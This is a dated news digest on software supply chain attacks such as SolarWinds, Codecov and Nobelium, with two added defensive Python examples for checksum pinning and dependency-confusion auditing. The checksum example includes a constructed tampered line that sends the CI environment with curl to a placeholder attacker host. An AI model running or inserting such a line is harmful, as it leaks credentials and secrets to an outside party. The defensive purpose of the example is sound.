How to ensure third parties don't compromise the organizational supply chain

Most organizations depend on many third-party vendors in their IT environment to store, secure, and analyze their data. In most cases, however, companies assess the security of these third-party products only when they are onboarded; there is no continuous security analysis or assessment. Organizations should demand a monthly security risk assessment report from all third-party vendors detailing all known issues in their product and infrastructure.


_______________________________________________________________________________________

(June 14, 2021)


Codecov to retire the Bash script responsible for supply chain attack wave

Codecov has introduced a new uploader, built on NodeJS, to replace and retire the Bash script at the center of its recent supply chain attack. The new uploader ships as a static binary executable for Windows, Linux, Alpine Linux, and macOS. Codecov's Bash uploader was the source of a string of supply chain attacks beginning around January 31, 2021, and made public on April 15.

Ref - ZDNet 
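The Codecov compromise worked because CI jobs fetched the uploader script from the vendor's site and piped it straight into bash, so a modified script ran unchallenged. The practitioner's countermeasure is to pin the expected digest in the repository and verify the downloaded artifact before executing it. The following is an added example of that fetch-verify-run pattern; it is not Codecov's code. The sample script, the tampered variant and the checksum file are constructed here (the pin is derived from the sample so the example is self-contained; in a real pipeline it is copied from the vendor's published checksum file, after checking its signature, and committed alongside the CI config).

```python
"""Pin-and-verify pattern for a downloaded CI helper: refuse to execute a
script (or binary) whose SHA-256 does not match a checksum committed to the
repository. Added example; the script, tampering and pin are constructed."""
import hashlib
import hmac
import os
import subprocess
import tempfile

# Constructed stand-in for a downloaded uploader script.
GOOD_SCRIPT = b'#!/bin/sh\necho "upload ok"\n'
# Constructed tampering of the kind seen in the Codecov incident: an added line
# that posts the CI environment to an attacker-controlled host (placeholder URL).
TAMPERED_SCRIPT = GOOD_SCRIPT + b'curl -sm 0.5 -d "$(env)" http://attacker.invalid/upload\n'

# Stand-in for the committed checksum file, in sha256sum(1) format.
# Real pipelines copy this from the vendor's published SHA256SUM, not from the
# artifact being checked.
PINNED_SHA256SUM = hashlib.sha256(GOOD_SCRIPT).hexdigest() + "  codecov\n"


def parse_sha256sums(text):
    """Parse sha256sum(1) output lines '<hex>  <name>' into {name: hex}."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        name = name.lstrip("*")  # sha256sum marks binary mode with a leading '*'
        if not sep or len(digest) != 64 or any(c not in "0123456789abcdefABCDEF" for c in digest):
            raise ValueError(f"malformed checksum line: {line!r}")
        sums[name.strip()] = digest.lower()
    return sums


def verify_sha256(data, expected_hex):
    """Constant-time comparison of the artifact digest with the pinned value."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_hex.lower())


def check_artifact(data, name, sums):
    """True only when `name` has a pin and `data` matches it."""
    return name in sums and verify_sha256(data, sums[name])


def run_if_verified(data, name, sums, interpreter=("sh",)):
    """Write the artifact to a temporary file and execute it only after it
    verifies; this replaces `curl ... | bash` with fetch, verify, then run."""
    if not check_artifact(data, name, sums):
        raise RuntimeError(f"refusing to run {name}: checksum missing or mismatched")
    fd, path = tempfile.mkstemp(suffix=".sh")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        os.chmod(path, 0o700)
        return subprocess.run([*interpreter, path], capture_output=True,
                              text=True, check=True).stdout
    finally:
        os.unlink(path)


if __name__ == "__main__":
    sums = parse_sha256sums(PINNED_SHA256SUM)
    print(run_if_verified(GOOD_SCRIPT, "codecov", sums), end="")
    try:
        run_if_verified(TAMPERED_SCRIPT, "codecov", sums)
    except RuntimeError as e:
        print(e)
```

The same check applies unchanged to the new static binary: pin its digest per release and fail the build on mismatch. A checksum pin catches tampering of the hosted file but not a malicious release signed and published by the vendor itself; that case needs review of what changed between pinned versions.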

_______________________________________________________________________________________

(June 13, 2021)


SolarWinds hack emboldened cyberattackers for ransomware attack spree

When a cyberattack successfully occurs on the scale of SolarWinds, history suggests hackers are emboldened to come back for more money, valuable data, and fame. The SolarWinds hackers' tactics and techniques worked so remarkably well last year that there was an incentive for them and others like them to keep going.

Ref - Yahoo 

_______________________________________________________________________________________

(June 11, 2021)


Monumental supply-chain attack on Airlines traced to APT41

A monster cyberattack on SITA, a global IT provider for 90 percent of the world’s airline industry, is slowly unfolding to reveal the largest supply-chain attack on the airline industry in history. After Air India revealed the details of its security breach, it became clear that the carriers were most likely dealing with one of the biggest supply-chain attacks in the airline industry’s history, potentially traced back to the Chinese state-sponsored threat actor APT41.

 
_______________________________________________________________________________________

(June 10, 2021)


Mitigating third-party risks with effective cyber risk management

When it comes to cybersecurity, all sides involved in a business have to hold up their end of the bargain. A customer organization has to understand that it retains responsibility for the data it shares with third parties and that the third parties that hold and use that data, are effectively an extension of the customer’s business.


_______________________________________________________________________________________

(June 10, 2021)


What SolarWinds taught enterprises about data protection

The SolarWinds breach has forced businesses worldwide to reconsider their approach to data protection and overall security. The event highlighted the level of potential devastation had the SolarWinds’ hackers chosen to encrypt the data and hold it for ransom. A recent report found the number of ransomware attacks grew by more than 150% in 2020, as cybercriminals took advantage of work-from-home vulnerabilities.


_______________________________________________________________________________________

(June 9, 2021)


Hardening the physical security supply chain to mitigate the cyber-risk

A recent report by Genetec found that 67% of physical security professionals, including Genetec's end users, integrators, and partners, are planning to prioritize their cybersecurity strategy in 2021. IP security cameras and other security devices are by their very nature connected to the internet. When not secured properly, any camera or access control device in the so-called IoT can be accessed remotely by just about anyone.

 
_______________________________________________________________________________________

(June 9, 2021)


How to stop SolarWinds-like hacks

Researchers from Ohio State University and Potomac Research LLC, led by Noeloikeau Charlot, published a paper on the idea of using "physically unclonable functions (PUFs)." At a microscopic level, even mass-produced computer chips have tiny differences from one chip to the next. For example, an online bank can check a device's PUF to make sure that only someone with the right device is accessing a bank account. This could help detect attacks that bypass two-factor authentication, a technique the SolarWinds attackers used.

Ref - Nautil.us 

_______________________________________________________________________________________

(June 9, 2021)


Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack

ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year. According to reports from G DATA and Verint Systems, the cyberspies used spear-phishing emails with document attachments exploiting the CVE-2012-0158 Microsoft Office vulnerability to deliver the malware.


_______________________________________________________________________________________

(June 8, 2021)


Protecting Industrial Control Systems against cyberattacks

ICS infrastructures are challenged to confirm the security of the supply chain for the OT system devices and sensors they rely on. There is no requirement to comply with the ISO/IEC 27001:2013 standard, which means ICS operators must often verify the security of their suppliers themselves. For multiple reasons, supply chains cannot be assumed to be a trusted method of software delivery.


_______________________________________________________________________________________

(June 8, 2021)


The next phase of software supply chain security

The recent executive order by President Joe Biden does several important things related to software supply chain security. It requires NIST to develop baseline security standards for software used by government agencies. Those standards must cover secure software development environments, including practices such as using administratively separate build environments and auditing trust relationships.


_______________________________________________________________________________________

(June 8, 2021)


The rise and rise of supply chain attacks

There are some driving forces behind the rising popularity of supply chain attacks. The cyber defenses of many high-value targets are in much better shape than before. Direct attacks against target systems may take a lot of effort and yield few results. Hence, it is more effective for cybercriminals to move up the software supply chain to exploit weak links outside their target’s cyber defenses.


_______________________________________________________________________________________

(June 8, 2021)


Supply chain security awareness - Key risk factors

As the SolarWinds breach was underway, global supply chains elsewhere were pelted with an ongoing barrage of volatility: the COVID-19 pandemic dramatically shifted demand while pushing employees out of traditional office infrastructures and into their homes, growing trade conflicts rendered supply chain hardware and software at risk of weaponization, and significant changes in industrial regulation heaped expensive penalties and restrictions on already-stressed businesses.


_______________________________________________________________________________________

(June 7, 2021)


Defending against Software supply chain attacks: Recommendations from NIST

Given the sparsity of rapid mitigation options in the event of a software supply chain attack (because the victim organization has no authority to command a timely response from its software vendor), it is far more beneficial to invest in preventive measures. Experts recommend applying a risk management lens when purchasing software and asking prospective vendors for compliance verification.


_______________________________________________________________________________________

(June 6, 2021)


Why are supply chain attacks scary?

Supply chain attacks are scary because they're really hard to deal with, and because they make it clear you're trusting a whole ecology. You're trusting every vendor whose code is on your machine, and you're trusting every vendor's vendor. The rise in supply chain attacks, Berkeley's Weaver argues, may be due in part to improved defenses against more rudimentary assaults.

 
_______________________________________________________________________________________

(June 5, 2021)


CEO of Mandiant talks about SolarWinds hack

Kevin Mandia, CEO of Mandiant, pointed out in an interview at a WSJ cybersecurity event that there is an ongoing attempt to define what is and is not considered cyberwar and grounds for retaliation by the U.S. government. He commented that "apparently supply chain attacks are fair game."

Ref - Medium 

_______________________________________________________________________________________

(June 4, 2021)


Strengthening US cybersecurity: Impacts of the Executive Order

Even though the specifics of the executive order are not available today, compliance officers can start to anticipate the changes the business will need to make. First, they can expect to perform a fresh assessment of compliance risks under the new cybersecurity requirements. Second, they need to consider the new policies and procedures their business might need to implement.

Ref - JD Supra 

_______________________________________________________________________________________

(June 4, 2021)


As cyberattacks surge, Biden seeks to mount a better defense

As the cyber breaches pile up, cyber experts say it's important to note the country is facing two distinct threats. On one side is the SolarWinds attack, which was primarily an intelligence-gathering operation carried out by Russia's foreign intelligence service, the SVR, which was quietly stealing U.S. government secrets for months. On the other side is ransomware, which is surging. Russian criminal gangs are blamed for both the Colonial Pipeline attack and the hack that briefly shut down the world's largest meat supplier, JBS.

Ref - NPR

_______________________________________________________________________________________

(June 3, 2021)


Dependency confusion: Compromising the supply chain

Researcher Alex Birsan demonstrated that if an attacker registers the names of an organization's private packages on public package repositories and uploads versions containing malicious code, package managers can pull the public version into internal applications, resulting in data exfiltration or remote code execution. He details how he exploited this vector to get his code running inside Apple, Shopify, Microsoft, and PayPal, among others, and collected large bug bounties.


_______________________________________________________________________________________

(June 3, 2021)


Organizations are still wondering about Dependency Confusion attacks

In early February 2021, the dependency confusion technique was revealed, affecting the npm repository and other public package registries and reaching into major technology companies, including Microsoft, Tesla, and Netflix. Although 35 companies were named, the issue affected many more, with hundreds of copycat packages appearing on the npm repository. While routing rules for internal repositories can manage some of the risk, they require manual adjustment and quickly go out of date, so automation is necessary to keep on top of the issue.

Ref - Sonatype 
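The two dependency confusion entries above describe the mechanism (a public package carrying a private name, and a resolver that prefers the higher version or the wrong registry) and the fact that routing rules drift. The following added example, not from either article, shows the two checks a practitioner wants: an audit of a package-lock.json that flags private-scoped packages whose `resolved` URL points at a public host, and a small model of why a resolver that merges several indexes (pip with `--extra-index-url`, or a proxy group fronting an internal repo and the public registry) hands the win to the attacker's inflated version number. The lockfile, the `@acme` scope and the internal registry host are constructed assumptions.

```python
"""Dependency-confusion audit for an npm lockfile, plus a model of
merged-index version resolution. Added example; the lockfile, the private
scope "@acme" and the internal registry host are assumptions."""
import json
from urllib.parse import urlparse

# Constructed package-lock.json (lockfileVersion 2). @acme/billing-utils is the
# bad case: it resolved to registry.npmjs.org, so a public package with the
# private name won the resolution (note the implausibly high version).
SAMPLE_LOCK = json.dumps({
    "name": "internal-app",
    "lockfileVersion": 2,
    "packages": {
        "": {"name": "internal-app", "version": "1.0.0"},
        "node_modules/@acme/auth-client": {
            "version": "2.3.1",
            "resolved": "https://npm.internal.acme.example/@acme%2fauth-client/-/auth-client-2.3.1.tgz",
        },
        "node_modules/@acme/billing-utils": {
            "version": "99.9.9",
            "resolved": "https://registry.npmjs.org/@acme/billing-utils/-/billing-utils-99.9.9.tgz",
        },
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
        },
    },
})

PRIVATE_SCOPES = {"@acme"}                       # assumed private npm scope(s)
TRUSTED_HOSTS = {"npm.internal.acme.example"}    # assumed internal registry host


def package_name(lock_path):
    """'node_modules/a/node_modules/@s/b' -> '@s/b'; the root entry '' -> ''."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock_text, private_scopes=PRIVATE_SCOPES, trusted_hosts=TRUSTED_HOSTS):
    """Return [(name, version, host)] for private-scoped packages whose
    'resolved' URL points anywhere other than the internal registry."""
    findings = []
    for lock_path, meta in json.loads(lock_text).get("packages", {}).items():
        name = package_name(lock_path)
        if not name.startswith("@") or name.split("/", 1)[0] not in private_scopes:
            continue
        host = urlparse(meta.get("resolved", "")).hostname or "(none)"
        if host not in trusted_hosts:
            findings.append((name, meta.get("version"), host))
    return findings


def version_key(v):
    """Numeric sort key for dotted versions, so '1.10.0' > '1.9.2'."""
    return tuple(int(p) for p in v.split("."))


def merged_index_resolution(candidates):
    """Model a resolver that merges several indexes and takes the highest
    version regardless of source. candidates: [(version, source)]."""
    return max(candidates, key=lambda c: version_key(c[0]))


def npmrc_scope_binding(scopes, registry):
    """.npmrc lines that pin each private scope to the internal registry, so
    npm never asks the public registry for those names at all."""
    return "".join(f"{s}:registry={registry}\n" for s in sorted(scopes))


if __name__ == "__main__":
    for name, version, host in audit_lockfile(SAMPLE_LOCK):
        print(f"CONFUSION RISK: {name}@{version} resolved from {host}")
    print(merged_index_resolution([("1.4.0", "internal"), ("99.0.0", "public")]))
    print(npmrc_scope_binding(PRIVATE_SCOPES, "https://npm.internal.acme.example/"), end="")
```

Run the audit in CI against the committed lockfile and fail the build on any finding; it catches a bad resolution after the fact even when the routing rules have drifted. The scope binding is the preventive half: with `@acme:registry=` pinned, a public `@acme/billing-utils` is never consulted. For pip, the equivalent is a single `--index-url` pointing at the internal index (which itself proxies the public one with private names reserved) rather than `--extra-index-url`, which is exactly the merged-index behaviour modelled above.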

_______________________________________________________________________________________

(June 3, 2021)


Challenges with protecting the Supply Chain

To protect the supply chain, businesses should first identify key assets, identify partners, and determine what access those partners have to the key assets. Industry frameworks such as NIST, OWASP, and the CIS Controls all call for knowing where critical assets are, be they hardware, software, endpoints, or applications. However, compiling these inventories is a struggle for most.

Ref - Toolbox 

_______________________________________________________________________________________

(June 3, 2021)


Japanese government agencies suffered supply chain attack exposing proprietary data

Several Japanese government agencies reportedly suffered data breaches originating from Fujitsu's "ProjectWEB" information sharing tool. Fujitsu had earlier disclosed that hackers gained unauthorized access to the system and stole customer data. Investigators said that the cyberattack affected the Japanese Ministry of Land, Infrastructure, Transport and Tourism, the Cabinet Secretariat, and Narita International Airport.

Ref - CPO Magazine 

_______________________________________________________________________________________

(June 2, 2021)


Proactive security key to combating supply chain attacks

Threat actors are becoming more sophisticated and are constantly evolving their capabilities to remain effective in their operations. To this end, organizations need to invest in the people, processes, and technology they deploy across their network in order to stand the best chance of preventing an attack. This will result in the development of capabilities and processes that will help to remediate any attacks as efficiently as possible, reducing the potential impact to both the organization and its customers.


_______________________________________________________________________________________

(June 1, 2021)


NobleBaron poisoned installers could be used in supply chain attacks

The latest wave of attacks being attributed to APT29/Nobelium threat actors includes a custom downloader that is part of a “poisoned update installer” for electronic keys used by the Ukrainian government. The latest iteration of malware activity linked to Nobelium uses a convoluted multi-stage infection chain that runs five to six layers deep. This includes the use of ‘DLL_stageless’ downloaders, called NativeZone.

Ref - SentinelOne 

_______________________________________________________________________________________

(June 1, 2021)


SolarWinds attack was an attack on trust

The SolarWinds hack last year offered some valuable insights into the true cost of a cyberattack, said Charl van der Walt, head of security research at Orange Cyberdefense, delivering one of the opening keynote addresses at the ITWeb Security Summit 2021. The impact is an attack on trust, and the consequence of this is fear, uncertainty, and doubt, which can be expensive and highly damaging.

Ref - IT Web 

_______________________________________________________________________________________

(June 1, 2021)


The U.S. seizes domains used by SolarWinds hackers

The U.S. Department of Justice (DoJ) disclosed that it intervened to take control of two command-and-control (C2) and malware distribution domains used in the recent attack campaign. The court-authorized domain seizure took place on May 28, the DoJ said, adding the action was aimed at disrupting the threat actors' follow-on exploitation of victims as well as block their ability to compromise new systems.


_______________________________________________________________________________________

(June 1, 2021)


Defining linchpins: An industry perspective on remediating Sunburst

The Atlantic Council’s latest report “Broken Trust: Lessons from Sunburst” introduces the concept of “linchpins,” which it defines as widely used software with significant permissions ... on which every other security program or critical resource depends, and which were a key factor in the Sunburst event. The report identifies challenges to identifying, securing, and triaging this linchpin software. 

Ref - CSO Online 

_______________________________________________________________________________________

(May 31, 2021)


CISA-FBI Alert: 350 organizations targeted in attack abusing email marketing service

According to the FBI and CISA, the attackers actually sent spear-phishing emails to over 7,000 accounts at 350 organizations, including government, non-governmental and intergovernmental organizations. The initial estimates said that the attack had targeted roughly 3,000 accounts across more than 150 organizations.


_______________________________________________________________________________________

(May 31, 2021)


Why are supply chain attacks so dangerous?

By compromising a single supplier, spies or saboteurs can hijack its distribution systems to turn any application they sell, any software update they push out, even the physical equipment they ship to customers, into Trojan horses. With one well-placed intrusion, they can create a springboard to the networks of a supplier's customers—sometimes numbering hundreds or even thousands of victims.

Ref - Wired

_______________________________________________________________________________________

(May 31, 2021)


SolarWinds and Colonial Pipeline crisis showed 7 ways to respond to cyberattacks

The federal government and other agencies have demonstrated several crisis management best practices in response to the recent cyberattacks against SolarWinds and Colonial Pipeline. Business leaders should keep these best practices in mind when they have to deal with cyberattacks—and other crisis situations—at their companies and organizations.

Ref - Forbes

_______________________________________________________________________________________

(May 30, 2021)


Defending and deterring the Nobelium attacks

Microsoft provided several recommendations for protection against attacks like SolarWinds. The first step is to opt for better defense. The best defense, according to Microsoft, is to move to the cloud, where the most secure technology from any cloud provider is always up to date, and where the fastest security innovations are occurring. The second step is to deter damaging attacks. Clearer rules for nation-state conduct need to be defined and agreed to by the international community.

Ref - Microsoft 

_______________________________________________________________________________________

(May 29, 2021)


Biden budget sets aside $750 million for SolarWinds response

U.S. President Joe Biden's proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack. The money comes on top of a $500 million fund for federal cybersecurity as the U.S. government recovers from the cyberattack that hit nine agencies including the State Department and Treasury.

Ref - Yahoo
 
_______________________________________________________________________________________

(May 28, 2021)


Breaking down Nobelium’s latest early-stage toolset

Each of the NOBELIUM tools is designed for flexibility, enabling the actor to adapt to operational challenges over time. Microsoft Threat Intelligence Center (MSTIC) has released an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations.

Ref - Microsoft 

_______________________________________________________________________________________

(May 28, 2021)


Sophisticated spear-phishing campaign targets Government organizations, IGOs, and NGOs

CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear). However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI urge governmental and international affairs organizations and individuals to adopt a heightened state of awareness and implement the recommendations specified in its advisory.

Ref - CISA 

_______________________________________________________________________________________

(May 28, 2021)


The key lesson from the SolarWinds hack is visibility

The SolarWinds attack has laid bare the interconnectedness of IT infrastructure: if most of the government and business infrastructure uses overlapping software packages, they are clearly not as separate from one another as they would like to think. Vulnerabilities could be anywhere throughout the supply chain. Why would hackers attack a single end-user when they can backdoor their way into all of them at once via a single service platform?

Ref - CIO 

_______________________________________________________________________________________

(May 28, 2021)


How Nobelium leveraged Constant Contact in the Phishing campaign

The May 25 phishing campaign included several iterations of emails sent from the Constant Contact account of USAID. In one example, the emails appear to originate from USAID. The emails posed as an “alert” from USAID dated May 25, 2021. If the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service and then redirects to a Nobelium “controlled infrastructure.” A “malicious ISO” file was then delivered to the system.

Ref - CRN

_______________________________________________________________________________________

(May 28, 2021)


Almost 3,000 emails targeted by Nobelium attack

The threat actor behind last year’s major SolarWinds hack has led a new targeted campaign spanning nearly 3,000 emails. According to reports, hackers accessed the Constant Contact account of USAID, the service used for email marketing. From there, Nobelium distributed phishing emails that, when clicked, inserted a malicious file used to distribute a backdoor called NativeZone. 

Ref - ARNNet 

_______________________________________________________________________________________

(May 28, 2021)


The group behind SolarWinds hack now targeting government agencies, NGOs - Microsoft

The group behind the SolarWinds cyberattack is now targeting government agencies, think tanks, consultants, and non-governmental organizations, Microsoft Corp said late on Thursday. While organizations in the United States received the largest share of attacks, targeted victims came from at least 24 countries, Microsoft said.

Ref - Reuters 

_______________________________________________________________________________________

(May 28, 2021)


Russia appears to carry out a hack through the system used by the U.S. Aid Agency

By breaching the systems of a supplier used by the federal government, the hackers sent out emails as recently as this week from more than 3,000 genuine-looking accounts. The emails carried a link to code that would give the hackers unlimited access to the recipients' computer systems, from stealing data to infecting other computers on a network.


_______________________________________________________________________________________

(May 27, 2021)


Another Nobelium Cyberattack

Microsoft has observed cyberattacks by the threat actor Nobelium targeting government agencies, think tanks, consultants, and non-governmental organizations. This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations. By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.

Ref - Microsoft 

_______________________________________________________________________________________

(May 27, 2021)


Attack on Fujitsu’s ProjectWEB SaaS platform may be the next big supply chain attack

While still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack, not unlike the one that targeted the SolarWinds supply chain. Impacted agencies include the Ministry of Land, Infrastructure, Transport, and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport in Tokyo.

Ref - SC Magazine 

_______________________________________________________________________________________

(May 27, 2021)


Canada Post falls victim to a third-party hack

Canada Post is the latest victim of a supply chain attack that allowed hackers to capture the names and addresses of almost one million senders and receivers of packages over a three-year period. This was the result of a cyberattack on its electronic data interchange (EDI) solution supplier, Commport Communications, which manages the shipping manifest data of large parcel business customers.


_______________________________________________________________________________________

(May 26, 2021)


The EU’s response to SolarWinds

Unofficial reports indicate that a number of EU member states are toying with the idea of introducing sanctions against Russian citizens who were allegedly involved in the SolarWinds campaign. Also, given the steady deterioration of EU-Russia relations in recent months, member states could be tempted to demonstrate their collective determination to push back against Russia and their commitment to the transatlantic alliance.

Ref - CFR 

_______________________________________________________________________________________

(May 26, 2021)


Newly discovered bugs in VSCode extensions could lead to supply chain attacks

Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks.


_______________________________________________________________________________________

(May 26, 2021)


How SolarWinds changed cybersecurity leadership's priorities

The recent Scale survey showed that in wake of SolarWinds attacks, security leaders are retooling their security operations in response to the changing threat environment. For instance, 36% said that they expected third-party risks to rise over the next 12 months. Around 47% said third-party risks are a top factor affecting the C-suite's understanding of the business impact of security, behind data breaches at 57% and remote work at 54%.


_______________________________________________________________________________________

(May 26, 2021)


Federal Agencies struggling with supply chain security

More than five months after the SolarWinds supply chain attack came to light, federal agencies continue to struggle with supply chain security, according to a Government Accountability Office official. In the absence of foundational risk management practices, malicious actors may continue to exploit vulnerabilities in the ICT supply chain, causing further disruption to mission operations, harm to individuals, or theft of intellectual property.


_______________________________________________________________________________________

(May 25, 2021)


Supply chain attacks: How to reduce open-source vulnerabilities

Organizations are increasingly turning to adversary simulation engagements to reduce the impact of supply chain attacks. In these tests, a ‘red’ team uses the same tactics, techniques, and procedures that threat actors employ. The ‘blue’ team responds to the attacks from the red team. They’ll gain valuable knowledge by combating the same tools threat actors are currently using.


_______________________________________________________________________________________

(May 25, 2021)


How to avoid web supply chain attacks

The simplest thing you can ask of a supplier is that contractors present a web vulnerability scanner compliance report, such as the OWASP Top 10 report offered by Acunetix. A report of this kind shows which scanner-detectable vulnerabilities the software you are purchasing has and whether they are of a type you should worry about; it does not cover what the scanner cannot see, so treat it as a floor for supplier security, not a guarantee.


_______________________________________________________________________________________

(May 25, 2021)


Three-quarters of CISOs predict another SolarWinds-style attack

Some 84% of global organizations have suffered a serious security incident over the past two years and a majority are expecting another SolarWinds-style supply chain attack, according to a new Splunk report.


_______________________________________________________________________________________

(May 25, 2021)


Tailor security training to developers to tackle software supply chain risks

A lack of cohesion between software development teams and cybersecurity functions compounds the software supply chain risks faced by organizations, making it all the more urgent for cybersecurity leaders and their teams to better engage with and educate developers. The training must be tailored to address the specific cyber risks surrounding the software development lifecycle.

Ref - CSO Online 

_______________________________________________________________________________________

(May 24, 2021)


Recent cyberattacks signal alarm for better supply chain security

There are three important lessons from the fallout of recent major cyber incidents, including SolarWinds attacks. Any organization leveraging third-party software must not take its convenience and claims of being secure at face value but pay attention to the integrity of the services they use. There must be a focus on container security. Before integrating a third-party service, organizations need to ensure that these vendors’ security standards are up-to-par.

 
_______________________________________________________________________________________

(May 24, 2021)


SolarWinds, Exchange attacks revive calls for mandatory breach notification

On the heels of three major cybersecurity incidents over the past six months (the SolarWinds supply chain attack, the mass exploitation of Microsoft Exchange Server zero-days, and the Colonial Pipeline ransomware attack), government officials and some in the private sector are reviving calls for better information sharing and national breach notification requirements.

Ref - CSO Online 

_______________________________________________________________________________________

(May 21, 2021)


E-commerce giant Mercari suffers major data breach in Codecov incident

E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. The company has confirmed that tens of thousands of customer records, including financial information, were exposed to external actors due to the Codecov breach.


_______________________________________________________________________________________

(May 21, 2021)


Department of Veterans Affairs not a victim of SolarWinds hack

The Department of Veterans Affairs (VA) was not a victim of the sweeping SolarWinds hacking campaign, the department's top cyber official told lawmakers. Paul Cunningham, chief information security officer of the VA, said there was no evidence of compromise across its wide-ranging and complex networks. He told lawmakers this finding was reaffirmed in separate investigations by CISA and the intelligence community.

Ref - Fed Scoop
 
_______________________________________________________________________________________

(May 20, 2021)


12 lessons learned from the SolarWinds breach

CRN spoke with 12 prominent C-suite executives at RSA Conference 2021 about the biggest lessons learned from one of the most infamous cyberattacks of all time. They compiled 12 major takeaways from the SolarWinds breach, from applying far greater scrutiny to technology suppliers and to code used during application development, to eliminating the use of on-premises Microsoft Active Directory.

Ref - CRN 

_______________________________________________________________________________________

(May 20, 2021)


SolarWinds attack dates back to at least January 2019

Hackers were present in SolarWinds' systems as early as January 2019, months earlier than previously reported, SolarWinds President and CEO Sudhakar Ramakrishna revealed during an appearance at the 2021 RSA Conference (RSAC). The delivery vector was the SolarWinds Orion software: the attackers compromised the build and update-distribution system for Orion and used it to push the backdoored update to SolarWinds' customers. How the attackers first got into SolarWinds' own network remains unconfirmed.

Ref - PCMag 

_______________________________________________________________________________________

(May 19, 2021)


SentinelOne: More supply chain attacks are coming

Large-scale supply chain attacks are here to stay, according to Marco Figueroa, the principal threat researcher at SentinelOne. During an RSA Conference 2021 session, Figueroa dissected Sunburst, the malware used to compromise SolarWinds' Orion platform that led to an extensive supply chain attack on dozens of organizations.

Ref - TechTarget 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO provides new details into attack and response

New details into the notorious SolarWinds nation-state attack and its fallout were provided by Sudhakar Ramakrishna, CEO of SolarWinds, during a keynote session on Day 3 of the virtual RSA Conference 2021. This included the revelation that the attackers may have accessed the system as early as January 2019 and an expression of remorse for comments made during his congressional appearance about the attack in February 2021.


_______________________________________________________________________________________

(May 19, 2021)


monday.com source code has been accessed by Codecov threat actors

monday.com has revealed that it was affected by the Codecov supply-chain attack that recently impacted several organizations. During the incident, threat actors accessed a read-only copy of its source code. The attack began around January 31, 2021, when the attackers modified Codecov's Bash Uploader script so that it collected credentials, tokens, and keys from the CI environments of hundreds of Codecov users.


_______________________________________________________________________________________

(May 19, 2021)


How CISA limited the impact of the SolarWinds attack

Soon after the specifics of the SolarWinds attack came to light, DHS went to work to limit the damage. One of the first steps was to load the attack signatures into the EINSTEIN toolset used by nearly every federal civilian agency. EINSTEIN then flagged suspicious network traffic from a handful of agencies; follow-up investigation by those agencies helped identify additional victims of the campaign.


_______________________________________________________________________________________

(May 19, 2021)


Pentagon’s CMMC compliance may block a SolarWinds-style attack

The Pentagon's Cybersecurity Maturity Model Certification (CMMC) program is designed to be one key line of defense. The program sets out five maturity levels applicable to defense industrial base contractors, based on the sensitivity of the information stored in their systems. Under the program, obtaining a certification of compliance at the appropriate risk level is an allowable cost. However, the extent to which contractors may have to dig into their own pockets to obtain certification is a running concern.

Ref - FCW 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO apologizes for blaming an intern

Sudhakar Ramakrishna, the former CEO of Pulse Secure who took the top job at SolarWinds, apologized for the way the company blamed an intern for using a weak password (solarwinds123) during early testimony before Congress. When asked about the password, former SolarWinds CEO Kevin Thompson had said it was a mistake an intern made. Ramakrishna had also told lawmakers that the password was from an intern's GitHub account.

Ref - The Record 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds - a harbinger for a national data breach reporting law

As the SolarWinds attack showed, the conversation around federal data breach reporting legislation is becoming increasingly relevant. FireEye's public disclosure of the attack exemplified the benefits of proactive partnerships between government and the private sector, which have been strengthened over the years by routine information sharing and other initiatives.

Ref - Duo 

_______________________________________________________________________________________


(May 18, 2021)


Government eyes new rules to tighten security against supply chain attacks

The UK Department for Digital, Culture, Media, and Sport (DCMS) has put out a call for views on new rules that may require IT service providers and managed service providers (MSPs) to undergo the same cybersecurity assessments that critical national infrastructure providers do.

Ref - ZDNet 

_______________________________________________________________________________________

(May 18, 2021)


Russian denial regarding SolarWinds hack is 'unconvincing'

Russia's denial of involvement in the SolarWinds hack is "unconvincing", the former head of GCHQ's National Cyber Security Centre has said. And Prof Ciaran Martin said there was evidence the tactics, techniques, and tools used by the hackers matched many years of SVR activity.

Ref - BBC 

_______________________________________________________________________________________

(May 18, 2021)


Russian spy chief denies SolarWinds attack

Russia's spy chief denied responsibility for the SolarWinds cyber attack but said he was "flattered" by the accusations from the U.S. and Britain that Russian foreign intelligence was behind such a sophisticated hack. Naryshkin said he did not want to accuse the U.S. of being behind the attack but quoted from documents leaked by former NSA contractor Edward Snowden to suggest that the tactics of the attack were similar to those used by U.S. and British intelligence agencies.

Ref - Reuters 

_______________________________________________________________________________________

(May 17, 2021)


Disconnect Internet for 3-5 days to evict SolarWinds hackers from the network

The newly published analysis report, AR21-134A, details resource-intensive and highly complex steps that will require disconnecting the enterprise network from the internet for three to five days. It is tailored for federal agencies that used affected versions of SolarWinds Orion and which discovered adversary activity within their environments (Category 3 agencies).


_______________________________________________________________________________________

(May 16, 2021)


SolarWinds breach exposes hybrid multi-cloud security weaknesses

